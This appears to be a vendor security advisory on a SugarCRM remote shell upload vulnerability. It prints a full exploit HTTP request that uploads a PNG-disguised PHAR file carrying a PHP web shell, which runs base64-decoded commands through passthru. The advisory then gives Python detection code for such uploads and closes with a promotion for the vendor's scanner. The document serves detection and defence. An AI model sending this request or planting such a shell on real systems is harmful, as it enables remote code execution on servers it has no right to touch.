SugarCRM is an open source customer relationship management suite.
SugarCRM versions up to 12.2.0 suffer from a remote shell upload vulnerability caused by improper input validation, which could allow a remote authenticated attacker to execute arbitrary code on the system.
By sending a specially crafted request to the EmailTemplates module, an attacker could exploit this vulnerability to execute arbitrary PHP code on the system.
POST /index.php HTTP/1.1
Host: 192.168.74.130:8080
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 577
Content-Type: multipart/form-data; boundary=24dca17724a5bf7732b724ccdaa83abd

--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="module"

EmailTemplates
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="action"

AttachFiles
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="file"; filename="sweet.phar"
Content-Type: image/png

.PNG . ... IHDR.............O.f....KPLTE<?php echo "#####"; passthru(base64_decode($_POST["c"])); echo "#####"; ?> ..x7... pHYs..........+.....*IDAT(.c`. ...YX..98..yx......ED..%.h..C...0..-L.Z.....IEND.B`.
--24dca17724a5bf7732b724ccdaa83abd--
By turning this request into a traffic file and a matching rule, we are able to detect attempts to exploit this vulnerability and execute arbitrary code on the system.
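As an added illustration of that matching logic (not Idappcom's signature or traffic file), the following Python parses a multipart upload body and flags the pattern shown in the request above: module set to EmailTemplates, action set to AttachFiles, and an attached file whose name carries a PHP-executable extension or whose body contains a PHP open tag despite an image Content-Type. The sample bodies are constructed, the boundary value is the one from the request above, and the extension set and indicator wording are assumptions.

```python
import os
import re
EXEC_EXTENSIONS = {".php", ".phar", ".phtml", ".php5"}  # assumption: PHP may execute these regardless of MIME type
PHP_TAG = re.compile(rb"<\?php|<\?=")
BOUNDARY = b"24dca17724a5bf7732b724ccdaa83abd"  # boundary value from the request above

def parse_multipart(body: bytes, boundary: bytes) -> list:
    """Split a multipart/form-data body into parts: name, filename, ctype, raw data."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter
        head, _, data = chunk[2:].partition(b"\r\n\r\n")  # skip CRLF after delimiter
        hdrs = {k.strip().lower(): v.strip()
                for k, _, v in (ln.partition(b":") for ln in head.split(b"\r\n"))}
        disp = hdrs.get(b"content-disposition", b"")
        name = re.search(rb'name="([^"]*)"', disp)
        fname = re.search(rb'filename="([^"]*)"', disp)
        parts.append({"name": name.group(1).decode() if name else "",
                      "filename": fname.group(1).decode() if fname else None,
                      "ctype": hdrs.get(b"content-type", b"").decode(),
                      "data": data[:-2] if data.endswith(b"\r\n") else data})
    return parts

def assess_upload(body: bytes, boundary: bytes = BOUNDARY) -> list:
    """Return indicators when an EmailTemplates/AttachFiles upload carries PHP code."""
    parts = parse_multipart(body, boundary)
    fields = {p["name"]: p["data"].decode("utf-8", "replace") for p in parts if p["filename"] is None}
    if (fields.get("module"), fields.get("action")) != ("EmailTemplates", "AttachFiles"):
        return []  # other modules and actions are outside this rule's scope
    reasons = []
    for p in (p for p in parts if p["filename"] is not None):
        if os.path.splitext(p["filename"].lower())[1] in EXEC_EXTENSIONS:
            reasons.append(f"executable extension on uploaded file {p['filename']}")
        if PHP_TAG.search(p["data"]):
            reasons.append(f"PHP open tag inside a body declared as {p['ctype'] or 'unknown'}")
    return reasons

def build_body(filename: str, ctype: str, data: bytes) -> bytes:
    """Constructed body with the same three fields as the captured request (not real traffic)."""
    d = b"--" + BOUNDARY
    return b"\r\n".join([
        d, b'Content-Disposition: form-data; name="module"', b"", b"EmailTemplates",
        d, b'Content-Disposition: form-data; name="action"', b"", b"AttachFiles",
        d, b'Content-Disposition: form-data; name="file"; filename="%s"' % filename.encode(),
        b"Content-Type: " + ctype.encode(), b"", data, d + b"--", b""])

# Constructed samples (not captured traffic): a benign PNG, and the PNG-signature-plus-PHP-tag polyglot shape.
BENIGN = build_body("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + bytes(16))
POLYGLOT = build_body("sweet.phar", "image/png", b"\x89PNG\r\n\x1a\n" + b"<?php echo 1; ?>")
```

Running `assess_upload(POLYGLOT)` returns both indicators, while the benign upload and the same polyglot sent to a different module return none.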
Idappcom has created signature 8023455 along with a traffic file for this vulnerability.
If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional